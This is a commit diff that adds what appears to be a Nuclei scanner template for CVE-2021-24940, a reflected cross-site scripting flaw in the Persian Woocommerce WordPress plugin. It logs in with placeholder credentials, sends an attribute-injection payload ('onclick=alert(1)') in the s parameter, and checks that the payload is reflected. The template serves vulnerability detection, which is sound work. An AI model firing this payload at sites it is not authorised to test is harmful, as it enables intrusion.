commit
c0fbac616e
|
@ -0,0 +1,40 @@
|
|||
id: CVE-2021-24940
|
||||
|
||||
info:
|
||||
name: Persian Woocommerce < 5.9.8 - Cross-Site Scripting
|
||||
author: daffainfo
|
||||
severity: medium
|
||||
description: |
|
||||
The Persian Woocommerce WordPress plugin through 5.8.0 does not escape the s parameter before outputting it back in an attribute in the admin dashboard, which could lead to a Reflected Cross-Site Scripting issue
|
||||
reference:
|
||||
- https://wpscan.com/vulnerability/1980c5ca-447d-4875-b542-9212cc7ff77f
|
||||
- https://nvd.nist.gov/vuln/detail/CVE-2021-24940
|
||||
classification:
|
||||
cve-id: CVE-2021-24940
|
||||
metadata:
|
||||
verified: true
|
||||
tags: cve,cve2021,wordpress,wp-plugin,wp,xss,authenticated
|
||||
|
||||
requests:
|
||||
- raw:
|
||||
- |
|
||||
POST /wp-login.php HTTP/1.1
|
||||
Host: {{Hostname}}
|
||||
Content-Type: application/x-www-form-urlencoded
|
||||
|
||||
log={{username}}&pwd={{password}}&wp-submit=Log+In&testcookie=1
|
||||
|
||||
- |
|
||||
GET /wp-admin/admin.php?page=persian-wc&s=xxxxx%22+accesskey%3DX+onclick%3Dalert%281%29+test%3D%22 HTTP/1.1
|
||||
Host: {{Hostname}}
|
||||
|
||||
req-condition: true
|
||||
cookie-reuse: true
|
||||
matchers:
|
||||
- type: dsl
|
||||
dsl:
|
||||
- contains(all_headers_2, "text/html")
|
||||
- status_code_2 == 200
|
||||
- contains(body_2, 'accesskey=X onclick=alert(1) test=')
|
||||
- contains(body_2, 'woocommerce_persian_translate')
|
||||
condition: and
|
Loading…
Reference in New Issue